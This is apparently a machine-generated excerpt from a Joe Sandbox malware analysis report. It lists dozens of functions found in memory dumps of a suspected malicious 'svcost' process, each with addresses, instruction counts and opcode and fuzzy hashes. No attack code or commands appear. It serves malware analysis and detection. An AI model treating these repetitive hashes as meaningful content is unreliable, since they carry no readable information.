                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e585b861772c4969e21e8d779949a0939b05998f69c3a475bc07fcbb1f604cab
                                                                                                • Instruction ID: 7cc1683fde2ecf71297e959e7243e2c2352d8c89180b095fdba39fd6854d860e
                                                                                                • Opcode Fuzzy Hash: e585b861772c4969e21e8d779949a0939b05998f69c3a475bc07fcbb1f604cab
                                                                                                • Instruction Fuzzy Hash: E9216F78A42629EFDB04DF99D994AADB7F2BF49301F214159E806AB360CB34AD41CB50
                                                                                                Function 0432B880 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f8e21c3ad795a77941a6fcf9e540b7650578c47626b193a39e7aa41f7901928c
                                                                                                • Instruction ID: 3545098e6508b76ef5a0f3da67c7399cb8048ea75cf50178bbc9763f5e613cf4
                                                                                                • Opcode Fuzzy Hash: f8e21c3ad795a77941a6fcf9e540b7650578c47626b193a39e7aa41f7901928c
                                                                                                • Instruction Fuzzy Hash: 3A0175326142A86FD754DE99D440BDAFBF5EB55360F2880ABE488D7251D631F980C750
                                                                                                Function 0432A828 Relevance: .1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc9845767600341d166d9caadd76d38ea341ffc3dcefb544f4653e0f16af0d6a
                                                                                                • Instruction ID: d7525c3ac699c7c07b1e8039ea839cc4392dbf6252e0179d099bdb55c7ed1e31
                                                                                                • Opcode Fuzzy Hash: dc9845767600341d166d9caadd76d38ea341ffc3dcefb544f4653e0f16af0d6a
                                                                                                • Instruction Fuzzy Hash: 98016C36350315AFD7109F59DC94FAE77A9FF89B21F104066FA15CB290C6B1D811DB90
                                                                                                Function 0541F030 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477406746.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5fa24d241fd3e427c5ae7e0bdb2ed900ec1289bf05a8460abf4ad695d3cbc0f8
                                                                                                • Instruction ID: d5e109bc399f704793e05a2b124756a3c6cb5691311d0b9c2460e498265092b1
                                                                                                • Opcode Fuzzy Hash: 5fa24d241fd3e427c5ae7e0bdb2ed900ec1289bf05a8460abf4ad695d3cbc0f8
                                                                                                • Instruction Fuzzy Hash: CE1109B0E002199FDB44DFA9C8517BFFBF1FF89300F10846A9418A7344D6319A018F91
                                                                                                Function 0432BA50 Relevance: .0, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 025aefa5cec03b6860162e157604611f91422023569062cc17a9133b34ccfd9e
                                                                                                • Instruction ID: 8f06e02d12fea9fcdad6fbba6182c74e50c45a95bf91958be1e3494c1e106f2c
                                                                                                • Opcode Fuzzy Hash: 025aefa5cec03b6860162e157604611f91422023569062cc17a9133b34ccfd9e
                                                                                                • Instruction Fuzzy Hash: 9DF0AF753004109FDB049E2DD8A5A6AFB96FBC9751B2481BAE609CB365DE31EC018790
                                                                                                Function 0432BA58 Relevance: .0, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f604e455bb05a35a7b9e7467b249a5fcb756341ecfc52f682d69ea5334d8b960
                                                                                                • Instruction ID: 558da2afeaf56562622781a5ea7a95494fd003d884c76155a5020276156257b1
                                                                                                • Opcode Fuzzy Hash: f604e455bb05a35a7b9e7467b249a5fcb756341ecfc52f682d69ea5334d8b960
                                                                                                • Instruction Fuzzy Hash: AAF0CD713000109FCB049E2ED894E6AFBDAFBC9660B2480B9E608CB365DE32FC0187D0
                                                                                                Function 00C4D480 Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1355ea2c4296ec09c34bc2c0b2da331df5ae708ac52b25166b2223b75132a35c
                                                                                                • Instruction ID: c20b6a9b1af06dca7e5daea7843fe927d95ff6dcc30ab64c5be936622dee4783
                                                                                                • Opcode Fuzzy Hash: 1355ea2c4296ec09c34bc2c0b2da331df5ae708ac52b25166b2223b75132a35c
                                                                                                • Instruction Fuzzy Hash: 48014B70D0520DEFCB00DFB8D9187AEBBB4FB49300F1045AAE409E3240E7345A40CB91
                                                                                                Function 00C2BA40 Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a9af9c8dd674478a6f88125a71293941201adc3efcf01b4784dcc621e1672a14
                                                                                                • Instruction ID: c1a9d4d46b36189c7f149efbbbd6f1f577ca159da71049ede4a96de3d444e72f
                                                                                                • Opcode Fuzzy Hash: a9af9c8dd674478a6f88125a71293941201adc3efcf01b4784dcc621e1672a14
                                                                                                • Instruction Fuzzy Hash: 04015E3180478ADFCF029FA9D8009E9BF74FF46310F048599E59467151D731AA56DB91
                                                                                                Function 0432D670 Relevance: .0, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 166a5077b31308719e0aa05e3dc61d645d37c6d6b5898a8690157fc5fec9be6a
                                                                                                • Instruction ID: ce362300a6149676cd927c752cfa63badc4fc29e44d0c49e6e12b2c2a74bc8da
                                                                                                • Opcode Fuzzy Hash: 166a5077b31308719e0aa05e3dc61d645d37c6d6b5898a8690157fc5fec9be6a
                                                                                                • Instruction Fuzzy Hash: 58F0F32244E7C44FC79386340CB6985BF309C5390030E86EB85858B0ABD958584ED772
                                                                                                Function 00C4E678 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9768af612c3ebb3526909b104b4efb715db0e69dd34f5d1fc8ed63417d606dcc
                                                                                                • Instruction ID: 6b288c793da3567aa12b5eb89275e56fe65480b5bc95fb4e03a0424d4b5a316e
                                                                                                • Opcode Fuzzy Hash: 9768af612c3ebb3526909b104b4efb715db0e69dd34f5d1fc8ed63417d606dcc
                                                                                                • Instruction Fuzzy Hash: C7F02231B042485BCB088A28D858AAEFFA6FFC5320F05817BE815C7361DE308C02C781
                                                                                                Function 04329C49 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c75c7266a37876f8d836a9fc302679d8ea803d68ff4556ee9bc960abc8a12a9
                                                                                                • Instruction ID: 933708674164a0bc15b829ef726a263960df12bf01e4931db424cd0a9f39cde5
                                                                                                • Opcode Fuzzy Hash: 6c75c7266a37876f8d836a9fc302679d8ea803d68ff4556ee9bc960abc8a12a9
                                                                                                • Instruction Fuzzy Hash: E2F0C2B2B0A3615FF71587649C10B66BBB9EF8A320F1540BAD4459F3A2DB71AC40C790
                                                                                                Function 00310992 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.473596557.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_310000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 731dccd587295ac8f256744374476dc0e979199bf7b41a5745893cab86b611da
                                                                                                • Instruction ID: 68008150738d2c8afa7e2ab185fc1f3659df2597afd1efa5ed77ee3295b120a4
                                                                                                • Opcode Fuzzy Hash: 731dccd587295ac8f256744374476dc0e979199bf7b41a5745893cab86b611da
                                                                                                • Instruction Fuzzy Hash: C3F0CD719041449FDF05D770C8699EF7FB99F85300F05856BD402AB292DEB46546C7C1
                                                                                                Function 04329CB0 Relevance: .0, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a2886522998439d6ebc2fab7379dad8a2844e94ecb3d46f9ce0c1e05e4e361c7
                                                                                                • Instruction ID: 7b6bb3d5d253e1953a6f5431f46c201c44e8c4fcdf84a9ab1eb219259e29980c
                                                                                                • Opcode Fuzzy Hash: a2886522998439d6ebc2fab7379dad8a2844e94ecb3d46f9ce0c1e05e4e361c7
                                                                                                • Instruction Fuzzy Hash: F3F0B4F2B0D3B15FF32207785C10335BBE59FC6211F1940ABD5868F3E2DA96A8029394
                                                                                                Function 04329C58 Relevance: .0, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e4d6db94df5edf7de26bc8b0d1e6eea261e27afc8508597a2104ab8b51220dc7
                                                                                                • Instruction ID: ca0855d2b8f57609d078268dc2e1acf16e648d9d0c06ecd3ad7ccc9e4dd24a87
                                                                                                • Opcode Fuzzy Hash: e4d6db94df5edf7de26bc8b0d1e6eea261e27afc8508597a2104ab8b51220dc7
                                                                                                • Instruction Fuzzy Hash: 25F0B4B2B086315FF71486599810B6AB7E9EFC9720F144029E5069F390CB71AC4183D4
                                                                                                Function 00C2C8E0 Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c335704273d2850688915f73ea00f5c99c039bb6c38823a4e1dd368fa6b39a0d
                                                                                                • Instruction ID: 969f55bb13f4b0bb318b36f24d17614e4538bd844b53544e5642c30170d6f6b1
                                                                                                • Opcode Fuzzy Hash: c335704273d2850688915f73ea00f5c99c039bb6c38823a4e1dd368fa6b39a0d
                                                                                                • Instruction Fuzzy Hash: F0F09C30808388EFC703DFA4D950A9CBF75EF06314F19C0D9D8945B692C6375A52DB51
                                                                                                Function 0432A818 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7944fe3ce03739f9abff4915ad76511058814d5f84c1e47d0e5de41c9daf341e
                                                                                                • Instruction ID: 0f2d31511344fc1783c236513f895596bb528ea40f5509a5147949c9e3d1efc9
                                                                                                • Opcode Fuzzy Hash: 7944fe3ce03739f9abff4915ad76511058814d5f84c1e47d0e5de41c9daf341e
                                                                                                • Instruction Fuzzy Hash: 46F090353083959FC7018F29D894C9A7FB4EF8A61031580AAE405C7222CA70DC05CB60
                                                                                                Function 0432BF10 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dd62f8b3729d13f78eb93613c546dea98b2fad5464932ed3e1d6a785546f75ce
                                                                                                • Instruction ID: 3670ebbe0a723c98045ecb3078a957beaf16090c2570a9227b1a1881ae3c0e22
                                                                                                • Opcode Fuzzy Hash: dd62f8b3729d13f78eb93613c546dea98b2fad5464932ed3e1d6a785546f75ce
                                                                                                • Instruction Fuzzy Hash: 7CF0543190C798AFCB06CB7498587DDBFB6DF81210F09C1EAE04AD72A2DB741A85CB51
                                                                                                Function 0432DB88 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94fd191894efc2c8b6d03a38001694d59c271efb376ef227045a304ea30a1565
                                                                                                • Instruction ID: 1998691b27b6f1b8859ea40a73f25e5099d49bf483129a50ac0448095af3214c
                                                                                                • Opcode Fuzzy Hash: 94fd191894efc2c8b6d03a38001694d59c271efb376ef227045a304ea30a1565
                                                                                                • Instruction Fuzzy Hash: 0EF06D359082598BCB09CFA4CD259EEBFB1EF89200F14856AC042B7295CBB52904CBA1
                                                                                                Function 00C459D1 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 25c6f3c76e21fc03f550b3746a2f7e4ed97cf6fafc33d3c07656c96b6d660a51
                                                                                                • Instruction ID: a3ae7a60fe038bbbcef27e5e495269388e359ddd92880799a394d22b990be3f9
                                                                                                • Opcode Fuzzy Hash: 25c6f3c76e21fc03f550b3746a2f7e4ed97cf6fafc33d3c07656c96b6d660a51
                                                                                                • Instruction Fuzzy Hash: CF01F270A19618CFCB14DFA6CA89AECB7F5BF49301F1092A5A00EAB252D7348E45DF51
                                                                                                Function 00C2BA50 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73f717f7fc8adceeaf55a097cb079a35fd6c4a71a0d137f02d507e8ce0465e53
                                                                                                • Instruction ID: cbfb0bb995a58c59cad4cbe1432a5408d505eddd3147edd9376581fed18129aa
                                                                                                • Opcode Fuzzy Hash: 73f717f7fc8adceeaf55a097cb079a35fd6c4a71a0d137f02d507e8ce0465e53
                                                                                                • Instruction Fuzzy Hash: A3F0E731C0021AEBCF01DF99D8149EEBB75FF89324F10C519E95827210D732AAA6DB90
                                                                                                Function 00C2E4F6 Relevance: .0, Instructions: 32COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ddddf8465d1fd4762969b0e84ecf3eedd5048679aca3a97e7b7a886b6fe5ae53
                                                                                                • Instruction ID: ecd2ad701c7b4d04aed6a232f0707eecc1fdde96f57fc4d2d532d0680dcb4179
                                                                                                • Opcode Fuzzy Hash: ddddf8465d1fd4762969b0e84ecf3eedd5048679aca3a97e7b7a886b6fe5ae53
                                                                                                • Instruction Fuzzy Hash: ADF0EC3190070A9BCB14DFA9D8549D9F7B4FF89314F10D669D55837600E731AA96CB90
                                                                                                Function 00C49048 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ab2a3da8c308505a3567bc016536d28f071c418f2a73bb0e7d25775c1858fdc
                                                                                                • Instruction ID: 65e0c7d45258efe14941a3529c55a28a0e641c25001aacb96447941df212e2df
                                                                                                • Opcode Fuzzy Hash: 4ab2a3da8c308505a3567bc016536d28f071c418f2a73bb0e7d25775c1858fdc
                                                                                                • Instruction Fuzzy Hash: 86F06D70904248EFCB41CFA8C950AADBFF4FB49310F14C4DAE858D7251C2358A15DF10
                                                                                                Function 00C296F8 Relevance: .0, Instructions: 31COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 03dafdcea9bb0e27f8a8c113fa8578d6afba91b00476049abcffda0e1cee7e97
                                                                                                • Instruction ID: 40e8eccdbba4e3e472a5e4a13afc37ef62e7de666510772ea4a96084a3d6635f
                                                                                                • Opcode Fuzzy Hash: 03dafdcea9bb0e27f8a8c113fa8578d6afba91b00476049abcffda0e1cee7e97
                                                                                                • Instruction Fuzzy Hash: ECF09030809288AFCB02DFA4D8249A97F35EF07300F5880DAEC9457262C632A916EB53
                                                                                                Function 00C2E821 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d0148978ce4be6421adda131e3808f7ee2d4990f76613b0941f58d063f39245e
                                                                                                • Instruction ID: c52b755c36aae59552e137d18a54129d6a3f10b0050cf5ca5cf4662876f9b629
                                                                                                • Opcode Fuzzy Hash: d0148978ce4be6421adda131e3808f7ee2d4990f76613b0941f58d063f39245e
                                                                                                • Instruction Fuzzy Hash: 18F09034909288EFCB02CBA9D4509ACBF70EF46300F18C1DED88597792D2315E05DF51
                                                                                                Function 0432BF69 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ad8b0dbf42651b51d8ebe316867c07099eeee84581c19f0f4c55bd6691655195
                                                                                                • Instruction ID: de515400db849e9cc9b7867dec79d27492469e0dc9616a4e82fbd7a47dc15db0
                                                                                                • Opcode Fuzzy Hash: ad8b0dbf42651b51d8ebe316867c07099eeee84581c19f0f4c55bd6691655195
                                                                                                • Instruction Fuzzy Hash: 1EE0D83060CBA1BECB560F302F102257F957A8618070899BA8406CB5D2EE20F4008E21
                                                                                                Function 0432FF58 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 45d6f77e9d33cb921cfb4456ec2d331c162b4ab0d63981b1355d7b4ce9094472
                                                                                                • Instruction ID: 7c224fc3035e42af7994e8afadda1fc6463a2e27e00e0ec5ef1bbd1096875315
                                                                                                • Opcode Fuzzy Hash: 45d6f77e9d33cb921cfb4456ec2d331c162b4ab0d63981b1355d7b4ce9094472
                                                                                                • Instruction Fuzzy Hash: B0F0E530409248AFC305CFA8EA6159CBF74EB4B300F0481E9D88447342C6325A07CB81
                                                                                                Function 00C4D997 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1c54496bf08075182ece6d083f531009a287653fc4be4dc8193d27efdbbcb050
                                                                                                • Instruction ID: 1ceffdca60e3c95f8bf5a5070b9af7b282ebfe792572491d9967125ee03df610
                                                                                                • Opcode Fuzzy Hash: 1c54496bf08075182ece6d083f531009a287653fc4be4dc8193d27efdbbcb050
                                                                                                • Instruction Fuzzy Hash: 10F01D3494D388DFCB01DFB5E56499DBFB0EF4A200F1445EAD885D7662C6355944DF02
                                                                                                Function 04321292 Relevance: .0, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dadd3e8e78409ed3dcb6b57eddd9eba5927889eba59b029c6c76ef9e129473a4
                                                                                                • Instruction ID: 9d1a9e2b6cb35c167738bd052aebea4eb76bf3be21b4f44f3148786c07cd825f
                                                                                                • Opcode Fuzzy Hash: dadd3e8e78409ed3dcb6b57eddd9eba5927889eba59b029c6c76ef9e129473a4
                                                                                                • Instruction Fuzzy Hash: 34014B74D012688FDB65DF18D9847DDBBB5BB09301F1051EAE809B2250D7756F84CF01
                                                                                                Function 00C4D198 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474322665.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c40000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6f09ed94d9560dc91795ecb0c7d4e860472d564e3010c2e3cafb8e86a5fc9869
                                                                                                • Instruction ID: 1ce4690dc9368982acf99ed379b0274ea51663f61ede5ccf82f38b1bdc7e9588
                                                                                                • Opcode Fuzzy Hash: 6f09ed94d9560dc91795ecb0c7d4e860472d564e3010c2e3cafb8e86a5fc9869
                                                                                                • Instruction Fuzzy Hash: 91F0303480A348EFCB159FA4E8145ADBFB1EF46350F1092EAD88167252C7310A55DF41
                                                                                                Function 00C28CC0 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.474290985.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_c20000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73f1d17b50e55ac4caff906ee50f7cc89ed03ca209d9e6dbe1152a947f45dfb6
                                                                                                • Instruction ID: fa279156b092b7c52dff7bc580f120d78e979ed3fd3eef9e2c8be31d34c1342e
                                                                                                • Opcode Fuzzy Hash: 73f1d17b50e55ac4caff906ee50f7cc89ed03ca209d9e6dbe1152a947f45dfb6
                                                                                                • Instruction Fuzzy Hash: 9BF0653050A3889FD703F7B45911A997F75DF47244F9940F2D554C7163D9351D0987A2
                                                                                                Function 04328C21 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.477298141.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_4320000_svcost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 237e110b7e925e94ce68499b8748b1cca1b756bc871809182b6fc8f9e3a5db6c
                                                                                                • Instruction ID: 5b756953bb99d12a8f18bd5d25ba0412f3774c4556371b528a838389f4ff76be
                                                                                                • Opcode Fuzzy Hash: 237e110b7e925e94ce68499b8748b1cca1b756bc871809182b6fc8f9e3a5db6c
                                                                                                • Instruction Fuzzy Hash: EDF05E3090A3449FC745DFA4C95599CBFB0EB49200F04C1EA8858D7252D6359A06CB41
                                                                                                Function 04326218 Relevance: .0, Instructions: 28COMMON
